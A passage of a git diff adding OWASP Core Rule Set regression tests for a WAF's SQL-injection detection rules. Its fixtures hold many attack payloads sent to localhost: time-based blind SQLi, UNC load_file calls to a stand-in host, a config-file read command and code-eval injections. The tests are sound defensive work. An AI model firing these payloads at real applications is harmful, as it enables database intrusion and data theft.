+ - test_title: 942100-12
+ desc: "Advanced SQL injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "var=unittests@coreruleset.org\" sleep(10.to_i) \""
+ version: HTTP/1.0
+ output:
+ log_contains: id "942100"
+ - test_title: 942100-13
+ desc: "Advanced injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "var=\" | type %SystemDrive%\\\\config.ini | \""
+ version: HTTP/1.0
+ output:
+ log_contains: id "942100"
+ - test_title: 942100-14
+ desc: "Advanced SQL injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942100"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml
new file mode 100644
index 000000000..54893dc2c
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml
@@ -0,0 +1,91 @@
+---
+meta:
+ author: "Christian Folini"
+ description: Various SQL injection tests
+ enabled: true
+ name: 942101.yaml
+tests:
+ - test_title: 942101-1
+ desc: "Simple SQL Injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/1234%20OR%201=1"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942101"
+ - test_title: 942101-2
+ desc: "Basic SQL injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/2010-01-01'+sleep(20.to_i)+'"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942101"
+ - test_title: 942101-3
+ desc: "Simple SQL injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/EmptyValue'%20and%20526=527"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942101"
+ - test_title: 942101-4
+ desc: "Advanced SQL injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/foo')waitfor%20delay'5%3a0%3a20'--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942101"
+ - test_title: 942101-5
+ desc: "Simple function call"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/sleep(20)"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942101"
+ - test_title: 942101-6
+ desc: "Advanced SQL injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/unittests@coreruleset.org\"%20sleep(10.to_i)%20\""
+ version: HTTP/1.0
+ output:
+ log_contains: id "942101"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml
new file mode 100644
index 000000000..21900265f
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml
@@ -0,0 +1,22 @@
+---
+meta:
+ author: "Christian S.J. Peron"
+ description: None
+ enabled: true
+ name: 942110.yaml
+tests:
+ - test_title: 942110-1
+ desc: "Common SQL Injection Testing"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ # NB: false positives: /?var=\'\'
+ data: "var=%27%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942110"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml
new file mode 100644
index 000000000..58d77373e
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml
@@ -0,0 +1,321 @@
+---
+meta:
+ author: "Christian S.J. Peron, Christoph Hansen"
+ description: None
+ enabled: true
+ name: 942120.yaml
+tests:
+ - test_title: 942120-1
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ uri: "/?var=blahblah&var2=LIKE%20NULL"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-2
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=RegExp"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-3
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: ">>"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-4
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=%26%26"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-5
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "<<"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-6
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "%21%3D"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-7
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "||"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-8
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "XOR"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-9
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=%3C%3D"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-10
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "IS NULL"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-11
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "in (0,1)"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-12
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "in (2147483647,-1)"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-13
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=%3C%3D%3E"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-14
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "regexp"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-15
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "RLIKE"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-16
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "<>"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-17
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-18
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "+IN+%28815914%2C+815913%29%0A"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-19
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-20
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay= in ( Aa,- Ab-, and Ac)"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
+ - test_title: 942120-21
+ desc: "SQL Injection Attack: SQL Operator Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "%3E%3D"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942120"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml
new file mode 100644
index 000000000..b968ec550
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml
@@ -0,0 +1,112 @@
+---
+meta:
+ author: "Christian S.J. Peron and Allan Boll"
+ description: None
+ enabled: true
+ name: 942130.yaml
+tests:
+ - test_title: 942130-1
+ desc: "SQL Injection Attack: SQL Tautology"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942130"
+ - test_title: 942130-2
+ desc: "SQL Injection Attack: SQL Tautology"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ uri: "/?a=1=1"
+ version: HTTP/1.1
+ output:
+ log_contains: id "942130"
+ - test_title: 942130-3
+ desc: "SQL Injection Attack: SQL Tautology"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ uri: "/?a=11=1"
+ version: HTTP/1.1
+ output:
+ no_log_contains: id "942130"
+ - test_title: 942130-4
+ desc: "SQL Injection Attack: SQL Tautology"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ uri: "/?a=1=11"
+ version: HTTP/1.1
+ output:
+ no_log_contains: id "942130"
+ - test_title: 942130-5
+ desc: "SQL Injection Attack: SQL Tautology"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ uri: "/?a=11!=1"
+ version: HTTP/1.1
+ output:
+ log_contains: id "942130"
+ - test_title: 942130-6
+ desc: "SQL Injection Attack: SQL Tautology"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ uri: "/?a=1!=11"
+ version: HTTP/1.1
+ output:
+ log_contains: id "942130"
+ - test_title: 942130-7
+ desc: "SQL Injection Attack: SQL Tautology"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ uri: "/?a=11!=11"
+ version: HTTP/1.1
+ output:
+ no_log_contains: id "942130"
+ - test_title: 942130-8
+ desc: "SQL Injection Attack: SQL Tautology"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ uri: "/?a=b,1=1"
+ version: HTTP/1.1
+ output:
+ log_contains: id "942130"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
new file mode 100644
index 000000000..1f99f8bb8
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
@@ -0,0 +1,261 @@
+---
+meta:
+ author: "Christian S.J. Peron, Christoph Hansen"
+ description: None
+ enabled: true
+ name: 942140.yaml
+tests:
+ - test_title: 942140-1
+ desc: "SQL Injection Attack: Common DB Names Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ uri: "/?sql_table=pg_catalog"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942140"
+ - test_title: 942140-2
+ desc: "SQL Injection Attack: Common DB Names Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "INFORMATION_SCHEMA"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942140"
+ - test_title: 942140-3
+ desc: "SQL Injection Attack: Common DB Names Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "database("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942140"
+ - test_title: 942140-4
+ desc: "SQL Injection Attack: Common DB Names Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "db_name("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942140"
+ - test_title: 942140-5
+ desc: "SQL Injection Attack: Common DB Names Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "DaTaBasE("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942140"
+ - test_title: 942140-6
+ desc: "SQL Injection Attack: Common DB Names Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "InFoRmaTioN_ScHemA"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942140"
+ - test_title: 942140-7
+ desc: "SQL Injection Attack: Common DB Names Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "DB_NAME("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942140"
+ - test_title: 942140-8
+ desc: "SQL Injection Attack: Common DB Names Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "tempdb"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942140"
+ - test_title: 942140-9
+ desc: "SQL Injection Attack: Common DB Names Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "msdb"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942140"
+ - test_title: 942140-10
+ desc: "SQL Injection Attack: Common DB Names Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "mysql.db"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942140"
+ - test_title: 942140-11
+ desc: "SQL Injection Attack: Common DB Names Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "MSysAccessObjects"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942140"
+ - test_title: 942140-12
+ desc: "SQL Injection Attack: Common DB Names Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "Northwind"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942140"
+ - test_title: 942140-13
+ desc: "SQL Injection Attack: Common DB Names Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "northwind"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942140"
+ - test_title: 942140-14
+ desc: "SQL Injection Attack: Common DB Names Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "SCHEMA_NAME"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942140"
+ - test_title: 942140-15
+ desc: "SQL Injection Attack: Common DB Names Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "DATABASE("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942140"
+ - test_title: 942140-16
+ desc: "SQL Injection Attack: Common DB Names Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "schema_name"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942140"
+ - test_title: 942140-17
+ desc: "SQL Injection Attack: Common DB Names Detected"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "information_schema"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942140"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml
new file mode 100644
index 000000000..ca19c5f81
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml
@@ -0,0 +1,291 @@ +--- +meta: + author: "Christian Folini" + description: Various SQL injection tests + enabled: true + name: 942150.yaml +tests: + - test_title: 942150-1 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-2 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=1' and sleep(9) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-3 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=1(select*from(select(sleep(5)))d)" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-4 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-5 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=test')and (select*from(select(sleep(10)))d)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-6 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=foo'||(select extractvalue(xmltype('%tocob;" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-7 + desc: "Simple SQL injection" + stages: + - 
stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=config.ini' and sleep(91) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-8 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-9 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=None')and (select*from(select(sleep(10)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-10 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-11 + desc: "Simple injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=file:/init.ini'.sleep(12).'" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-12 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-13 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=(select 
load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-14 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-15 + desc: "Simple injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-16 + desc: "Simple injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=test{${sleep(12)}}" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-17 + desc: "Advanced injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-18 + desc: "Advanced injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-19 + desc: "Simple injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=\\foobar.txt\" or sleep(4) #" + version: 
HTTP/1.0 + output: + log_contains: id "942150" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml new file mode 100644 index 000000000..b27243430 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml 
@@ -0,0 +1,141 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen" + description: None + enabled: true + name: 942160.yaml +tests: + - test_title: 942160-1 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + uri: "/?sql_table=sleep%28534543%29" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-2 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "sleEP(3)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-3 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "sleep(5000)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-4 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "BENChmARk(2999/**/999,Md5(NoW()" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-5 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "BEncHMARk(2999999,Md5(NoW('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-6 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "BENCHMARK(5000000,MD5(0x48416166)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-7 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + 
